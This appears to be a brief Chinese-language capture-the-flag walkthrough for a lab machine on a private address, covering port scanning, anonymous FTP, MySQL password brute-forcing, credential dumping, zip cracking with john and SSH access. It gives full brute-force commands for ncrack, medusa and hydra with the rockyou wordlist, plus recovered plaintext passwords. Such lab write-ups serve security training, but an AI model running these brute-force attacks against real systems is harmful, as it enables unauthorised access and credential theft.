端口扫描
网络环境问题,还是得 nmap 的全端口扫描

ftp 匿名登录

爆破 mysql 密码
trainerjeff
接下来得看 mysql 了
hydra 好慢
换了 ncrack 试试
sudo ncrack -T5 -v -u trainerjeff -P /usr/share/wordlists/rockyou.txt mysql://192.168.10.8
sudo medusa -h 192.168.10.8 -u trainerjeff -P /usr/share/wordlists/rockyou.txt -M mysql
sudo hydra -l trainerjeff -P /usr/share/wordlists/rockyou.txt 192.168.10.8 mysql
没出来, 吐了, 每分钟八次. 太慢了. 看 wp 算了
假装枚举出来了

枚举 mysql 信息
sudo mysql -h 192.168.10.8 -u trainerjeff -psoccer1

| 1 | gonzalo tH1sS2stH3g0nz4l0pAsSWW0rDD!!
| 2 | $SECRETLOGINURL /secretLOGIN/login.html

web 枚举
进入之前 mysql 中发现的隐藏目录, 使用发现的用户名密码登录, 后面发现这个也能登录 ssh
进去之后有个压缩包, 有密码
使用 john
解压之后是一个账号和密码, 猜测是 ssh 的